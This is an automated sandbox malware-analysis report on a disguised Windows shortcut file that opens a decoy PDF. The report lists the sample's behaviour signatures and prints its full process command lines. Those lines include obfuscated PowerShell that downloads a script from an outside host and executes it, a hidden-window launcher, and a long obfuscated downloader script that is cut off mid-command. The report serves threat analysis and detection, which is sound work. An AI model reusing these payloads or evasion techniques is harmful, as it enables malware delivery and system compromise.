Overview

overview

8

Static

static

1

List of Re...es.lnk

windows7-x64

3

List of Re...es.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-07-2024 01:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    List of Required items and services/List of Required items and services.lnk

  • Size

    362.4MB

  • MD5

    28e4eea484100de0e40bdf9e1fca6c56

  • SHA1

    f576e0a276de1009256bacf81bc0fb4597b47eba

  • SHA256

    b6580a25ecaa55b3f6c2eb77b6addd0392be804e48e238d74d9df6913108a762

  • SHA512

    e7d5ae5e5d7c37ae6011d9ac1b4ea243533ce26b965c220aefba7e5159aded2b62407ac6abc83a44ba3d9a0390847a3fe44fb20783204a3613f0a15e59edf639

  • SSDEEP

    24:8CpHYVKVW7/CWxpfDN/lrfq/GWB/GP/Gw8+8JmVCEFlhLEIfAxk7Z5:8sabJq/BB/s/mPJJc7Kk

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\List of Required items and services\List of Required items and services.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${g72p14} = $PSHOME;${*tc18kw.} = ${g72p14}[+52 -53 +1] + ${g72p14}[-11 +2] + 'A' + ${g72p14}[-66 +55];${xih.} = $([TYPE]${*tc18kw.});${*.p9nc2a.} = ${xih.}::ToString(+79 -1 -5)+${xih.}::ToString(+79 -1 -5 -4)+${xih.}::ToString(+79 +30 -10 +21);&(${*.p9nc2a.})(&(${*.p9nc2a.})(${g72p14}[+52 -53 +1]+'u'+${g72p14}[-66 +55]+${g72p14}[-61 +55]+' https://www.delpas.it/mo/qc.txt -UseBasicParsing'))
      2⤵
      • Blocklisted process makes network request
      • Deletes itself
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2448
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\p9nc2a.vbs'"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3964
      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\List of Required items and services\List of Required items and services.pdf"
        3⤵
        • Checks processor information in registry
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:5604
        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1872
          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=14451DC1AE8363C917BEBD5673E33763 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
            5⤵
              PID:6136
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=19D8B4258FAC1A45292654036B235810 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=19D8B4258FAC1A45292654036B235810 --renderer-client-id=2 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job /prefetch:1
              5⤵
                PID:2404
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2B42D9B43FB6918674ABA9C867FD4804 --mojo-platform-channel-handle=2304 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                5⤵
                  PID:5616
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=07A5916451A06513AC4D66BDE4D3D8FC --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=07A5916451A06513AC4D66BDE4D3D8FC --renderer-client-id=5 --mojo-platform-channel-handle=2120 --allow-no-sandbox-job /prefetch:1
                  5⤵
                    PID:4184
                  • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CD97CB7AB196B3E91BD80BBAB85462A8 --mojo-platform-channel-handle=2644 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                    5⤵
                      PID:5180
                    • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62D1EBF13C8DFEC675011419752A2AD8 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                      5⤵
                        PID:3668
                  • C:\Windows\System32\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Public\yd2.vbs"
                    3⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:5112
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens';If (${host}.CurrentCulture) {$Spicehouse249++;}Function Volplanes($Milliardren){$rebait=$Milliardren.Length-$Spicehouse249;$Ggepulveres214='SUBsTR';$Ggepulveres214+='ing';For( $Regnerable=5;$Regnerable -lt $rebait;$Regnerable+=6){$taplb+=$Milliardren.$Ggepulveres214.Invoke( $Regnerable, $Spicehouse249);}$taplb;}function Tilhre($Miltsick){ & ($Parakelia) ($Miltsick);}$tailforemost=Volplanes 'AnnotMAtiono bilcz Skr iMonstl TekslSnyd,am.com/Mat r5Acerb.Pyrro0 Lsen Aflv,(Knas,W BlreiBlavenF.inlda gadoPersowDrives brov LeonNRoupiTGoust Hjhed1Situe0E erf. Shri0Smagl; E.ga ,avneW Chy,iCircunBeded6,appe4Bende;Misch SussexRevan6Bjrn.4 Trio;Anven T.dssr rivivPu ga:Chuga1Ma.gi2smit.1 Cons. Comp0C,eni),onpo Ade,iGIbidieE,lasc Recek P atoSu te/Poste2 Ting0salpi1Pendr0Thyge0Ritra1Bl,ge0Overn1 ,ovs TetraFKomm.iIndicrPaleneGe,kefsinguoTe.nix Kvit/Fa,ee1Drupa2 Krig1Nonex.,agbl0Nonun ';$Transformability=Volplanes 'HindbUGre.dsSvedjeQu.ysrFodno-NonreAVelm gSo.lmeTjen,nFescetAc iv ';$progressions=Volplanes ' ProchU.klitWagont rivepFrerbs L,xi:Moonc/Forbr/UvrdiwUnisswUds.rwHerna.Analya M.nnlbilbrmB strrAnbefwRive.aP rdodbrabr.Brugsc.overononfomSuper/Nona mH.shenTilde/ajospU IntedUnfr,lSkoleiSkaangtrevrgsoloueRea,prMethasSejrs.SolbehStyrehEtablkActin>non,ehDimentTilsetDim tp PrepsGenop:Alryd/Manco/TolvmwKvikrwtaljew Sten.Nekroe antarCh nqpFlagm-Nonasr OndyoSttteyVandgaDefaclMikro-SwallcVenezra.cliofilfow Lam nGigge.overgiPinlinIvrksfHexaso C ri/ Gastm vrisn Eska/Ph,llUPendudDeciblEuropiBarnegFejlsgovermeAnch,rS,ccesOverf.Unr,fh GuilhPhospkPrint ';$Falsificere=Volplanes 'inter> Disq ';$Parakelia=Volplanes '.yophiModsteFornrx Wo,l ';$Simar='Copyrights';$Supperne = Volplanes 'Gru deHandlcG.strhPartioPara Jespe%LongiaLe chpJaspepout.td Overarem ntfrygtaInt r%Skspo\LoharVUnforiSvupss rinaiSecu tSpliceViroirFe lteF,ondsFunkt.ProgrHExcruuEmpovdm.cra unbew&Decli&Ba ks Knusee grshcSl,brh LuftoNonsh BombytRei,v ';Tilhre (Volplanes 'ca pa$NonnegKva,il Cawio GynkbEv,luaUnderlCepha: HackBTegngrForesn Haple einefCarchdSinopsKontoeApprola.erdsSapo.dKultuaLiniegTomme=Hoved(VippecRefrem S yldGensk hygri/BrankcGener Uncro$DumblSOut auDyslep licep UnavePic.irMarlinRapsoeM.use)Medal ');Tilhre (Volplanes 'nimbl$C evogDansklHu froParambCarolaRumakl,peci: PaniGOp avlSpejlu TotatDreadiafhaet El,ciUnsoloTitann.reti2S,lke4 Ambi0 W.st=Beauj$ .hiapFis.ir popuoAkkilg Nonsr Puffe OversRiskfsJonahi KlunoS,uirnNonarsde ik..vergsJudicp AfrelPhylliherm t Tran(Nummi$,nhinFArbejaUnhu lLandrsMikroi F ruf.uisai BgescValkyeFarror Svige .ack) Yd,r ');Tilhre (Volplanes ' B,rh[SloppNTaksieNona.t Prag.TufthSPerseeG,anerRear,vRooibi,erricApocaem croPUdtolo PrejiArbejnMagnetOvervME.erga ,ilonc.yptaArbejgAllsweUdskirBatik] Last:Peger:GolbeSOverpe misacTransuUnpourpapyri BadetForuryDamewPSkldurligeso StratkageroBractcItenso FurelVolde ,rag=.ilms Livsf[DepraNBeda eBisubtUngdo. SpecSUndere OikocReveruCragsrKermeiI,dvitVulneyDygtiPCy,lorT,biro.ejrftKondioStillcB.ibeointralF,yenTLakkey ekrnpBedrieJe ni]Combi:D.nax: Eft,Tc gnalSafets Knud1Paste2Undul ');$progressions=$Glutition240[0];$Deliciousness= (Volplanes 'Mor.i$SkrifgSca.elFril,o Ufo,bMa era HypolA.ari: LedeL,phodnMoskgnNed liSplinnRavivgStoles Repadpekina BomrgT.anaeTr.sssUnspi=ap,esNSorg,e P,sew Chro-Imbo OdobbebParo jTvisteorgancPhaent Poit Udtr S.ackpy Henrs smaatF rreeRhizomForst.UdvikNTvrdrePe,chtHygro.Ka.beWTak feva sobOmstbClsseklKvadri Serre StilnDelirt');$Deliciousness+=$Brnefdselsdag[1];Tilhre ($Deliciousness);Tilhre (Volplanes ' Mund$ConceLKadminPie.enStudeiSelvbnGallogSemimsOverrd Prova.utopg Fejle AvansOrtho.P.ogrHKaerle Bnknaef,rgdSyllaeForr.r.renesHatch[Rumor$HieroTAd,norTioloaTandbnUndersEtablfSkaleoDeklarAfs,emThe yaT,hanbvinkliHa malRashei,ndvetgy.nay Bila]Taetd=Ombes$cho otTegnfaIdiosi,aabel vaunfU deroHjer,rpsitteDrawlm PrinoCent.sHandetsp.in ');$Benzinautomaten=Volplanes 'Kvote$,nfraLF,netnK.rsunDisiniCheninSafragNursisSkuffdChequaskygngKanoneTa nesSvvef.CamouDU baso PyntwLegalnSi ralPen.eopresuasondedKonfeF Ca,iiFor alSe,mie Silk(Par,l$Frstep UslurPenstohusmagPartirBetaleMollysTrembsSpritifeltmo .alkn CounsHarce,stile$u,uguTLokaleAdhregFo prnSublueMit.rbTombagNe,gae Gradr Tids)domne ';$Tegnebger=$Brnefdselsdag[0];Tilhre (Volplanes 'Co,li$Revolg KinglDirekoV,deobWindbaPrydelAirsc: Us aG.eoloi fgifvFortraNajadb .ryslAntise,umbl= Over(MastiTGranueChrissBurgot Fers-FantaP MuncaFilkotUngaihChurn ersk$UnderTBrn.peRter gMist.n KerneMethab Indfg StopeRrdamrnosog)Kog.i ');while (!$Givable) {Tilhre (Volplanes 'Point$Sociog GarvlMucouoc stob fremaSolinlVisse: IsceMRegi eBeb,dkSuperaDe,ignBr,kni Datas OrigeUninfrDesexeFjereno.isod ,visesta,ksSpice= Axop$S,abrtIrrearRolpeuConjueJeron ') ;Tilhre $Benzinautomaten;Tilhre (Volplanes 'indskSPrsentMaskia oaxerByldetVi eo-VenteSTonenlRec,ge,nstneS,rvipecard Dropw4Morg, ');Tilhre (Volplanes 'Tilke$AngiagCellolSnoedo Tastb ScraaPlintlAntib:WaterGassyriMongovGall,aPreapbSkemal ucieCorme=Ju,ic(EpithTOr,aneScr,bsAu ibtFrs.o- akuuPNecroaDragntM,delhUdfor Une a$.orbeTKlar.e elefg.negrnThunde Je.nb DeligWe sheIntrorFlank) To a ') ;Tilhre (Volplanes ' I du$ArbejgPseudlFolkeoForfrb SatsaLserflSuper:PhysiBWashsrKlatmuTomaemNrhedaf.ihel,lanoiSels.aChant=Unde $BesttgOerstlUncono tippbBetdsaF.cetlIsblo:saha SKommaaStuddmsyn,elDisc,iMyalln unexgPassisStrugrMejsleEgaligThe peIffymr,lostifishsnBlencgHaanee grnsn Mats+An.if+Sple.%Fejes$kongeGWestelBesseuEnthutSjofei Slv.tUnshaiPlagioVoldgnBa,eo2Bankk4 udby0Bouch.subclcParieoYor euSpindnDepontFresk ') ;$progressions=$Glutition240[$Brumalia];}$Existimation=345476;$Basigenous=28090;Tilhre (Volplanes 'Rhodi$Tima gTastal U,mioOverwblukkeaSportlKorre:ByretH C iroCottomM,byeos.otjn SagsyFortum.nproeTryllt lekssAffal odon=Blaam RegntG T,rkeTerzitdrago-CiselC polioc emonHadjitIn ideClu.pntri,utUlydi Bev $ScogiTElimieEst ogBemocnTowbaeReleabSupergNui.oeRadiar Barr ');Tilhre (Volplanes 'Hurs,$Mis.egHeppll ,erroPeritbFllesad.gtil Traf:BadevA uldmnMicrosOpt,eeBrev.eForhnnSmiledInflueOrphesRelea Ignor=Off.e Malle[ Ce.tSLujulyMotilsFarfdtKendeeAtweemcytas.ComprCSquamoLocksnFinanv QueneTakvirMace t ,att]Cripe:Inset: ,etsFr.styrAcepho RegrmOffenB Addua F,ass .vlveDeadf6Tre.o4 Sa tSStigntAfmnsrDobbei P,lonafstag Over(Z,nur$EndoaHEksemoIn ermForedoRootsnIntroyStamfmLut.aeTyll.tStablsStat,)proto ');Tilhre (Volplanes 'snr,l$.yplagUnprel .aveoBogklb,rerfaPrecol onoc:typesCUniceeimperm BorteTota t OutleTendorAerohiPrecaaBonnilBevog Disc=Unsin Pomf [ProgrSSynkryDeafns .icrtNytteePerdem arty.Welc,TGrasseSmig,xEfte t M.df. s,afEVarsknTeorecDk,etoAmbigdDecimiNeutrn SiligU,ens].arts:frate: blitARispaSarbitCChazyIFrydeIKu.ti.Bonn.G Aft,eBa,ehtMudreSSva,etLagerr DissiVarefnToparg,fsko(Rnebl$RaabeASkol.nSalvas P rteAfsaleOptegnSkramdSighteDeputs Flso)Hklet ');Tilhre (Volplanes 'Reli.$ Gorgg El.clEonscoTrabebFlu da Utakl Haar:cape,P,eminu.irekrT.nnipAtmialCompeeBero.wMo,ryoromauo amtsdTum l=Blush$NeuraC WeddeVe tkm Ruteel,etmtOms re,upinrBruttisklsaaApp,ylStr p.v talsduponuunspebHa.kesIntittPrestrKrigsi Spadn Fr mgFra.t(Guldd$Gyn,nE,nvibxaphesiFr.nksLituitBuazeiTimbemDommeaOl.sttKandiiElectoMollinMoxie, Gear$FundeBOpstvaKenotsSejrsiSkarng probe Clocni nicoSte kusulfisTinge)Sko s ');Tilhre $Purplewood;"
                      4⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4380
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Visiteres.Hud && echo t"
                        5⤵
                          PID:2472
                        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens';If (${host}.CurrentCulture) {$Spicehouse249++;}Function Volplanes($Milliardren){$rebait=$Milliardren.Length-$Spicehouse249;$Ggepulveres214='SUBsTR';$Ggepulveres214+='ing';For( $Regnerable=5;$Regnerable -lt $rebait;$Regnerable+=6){$taplb+=$Milliardren.$Ggepulveres214.Invoke( $Regnerable, $Spicehouse249);}$taplb;}function Tilhre($Miltsick){ & ($Parakelia) ($Miltsick);}$tailforemost=Volplanes 'AnnotMAtiono bilcz Skr iMonstl TekslSnyd,am.com/Mat r5Acerb.Pyrro0 Lsen Aflv,(Knas,W BlreiBlavenF.inlda gadoPersowDrives brov LeonNRoupiTGoust Hjhed1Situe0E erf. Shri0Smagl; E.ga ,avneW Chy,iCircunBeded6,appe4Bende;Misch SussexRevan6Bjrn.4 Trio;Anven T.dssr rivivPu ga:Chuga1Ma.gi2smit.1 Cons. Comp0C,eni),onpo Ade,iGIbidieE,lasc Recek P atoSu te/Poste2 Ting0salpi1Pendr0Thyge0Ritra1Bl,ge0Overn1 ,ovs TetraFKomm.iIndicrPaleneGe,kefsinguoTe.nix Kvit/Fa,ee1Drupa2 Krig1Nonex.,agbl0Nonun ';$Transformability=Volplanes 'HindbUGre.dsSvedjeQu.ysrFodno-NonreAVelm gSo.lmeTjen,nFescetAc iv ';$progressions=Volplanes ' ProchU.klitWagont rivepFrerbs L,xi:Moonc/Forbr/UvrdiwUnisswUds.rwHerna.Analya M.nnlbilbrmB strrAnbefwRive.aP rdodbrabr.Brugsc.overononfomSuper/Nona mH.shenTilde/ajospU IntedUnfr,lSkoleiSkaangtrevrgsoloueRea,prMethasSejrs.SolbehStyrehEtablkActin>non,ehDimentTilsetDim tp PrepsGenop:Alryd/Manco/TolvmwKvikrwtaljew Sten.Nekroe antarCh nqpFlagm-Nonasr OndyoSttteyVandgaDefaclMikro-SwallcVenezra.cliofilfow Lam nGigge.overgiPinlinIvrksfHexaso C ri/ Gastm vrisn Eska/Ph,llUPendudDeciblEuropiBarnegFejlsgovermeAnch,rS,ccesOverf.Unr,fh GuilhPhospkPrint ';$Falsificere=Volplanes 'inter> Disq ';$Parakelia=Volplanes '.yophiModsteFornrx Wo,l ';$Simar='Copyrights';$Supperne = Volplanes 'Gru deHandlcG.strhPartioPara Jespe%LongiaLe chpJaspepout.td Overarem ntfrygtaInt r%Skspo\LoharVUnforiSvupss rinaiSecu tSpliceViroirFe lteF,ondsFunkt.ProgrHExcruuEmpovdm.cra unbew&Decli&Ba ks Knusee grshcSl,brh LuftoNonsh BombytRei,v ';Tilhre (Volplanes 'ca pa$NonnegKva,il Cawio GynkbEv,luaUnderlCepha: HackBTegngrForesn Haple einefCarchdSinopsKontoeApprola.erdsSapo.dKultuaLiniegTomme=Hoved(VippecRefrem S yldGensk hygri/BrankcGener Uncro$DumblSOut auDyslep licep UnavePic.irMarlinRapsoeM.use)Medal ');Tilhre (Volplanes 'nimbl$C evogDansklHu froParambCarolaRumakl,peci: PaniGOp avlSpejlu TotatDreadiafhaet El,ciUnsoloTitann.reti2S,lke4 Ambi0 W.st=Beauj$ .hiapFis.ir popuoAkkilg Nonsr Puffe OversRiskfsJonahi KlunoS,uirnNonarsde ik..vergsJudicp AfrelPhylliherm t Tran(Nummi$,nhinFArbejaUnhu lLandrsMikroi F ruf.uisai BgescValkyeFarror Svige .ack) Yd,r ');Tilhre (Volplanes ' B,rh[SloppNTaksieNona.t Prag.TufthSPerseeG,anerRear,vRooibi,erricApocaem croPUdtolo PrejiArbejnMagnetOvervME.erga ,ilonc.yptaArbejgAllsweUdskirBatik] Last:Peger:GolbeSOverpe misacTransuUnpourpapyri BadetForuryDamewPSkldurligeso StratkageroBractcItenso FurelVolde ,rag=.ilms Livsf[DepraNBeda eBisubtUngdo. 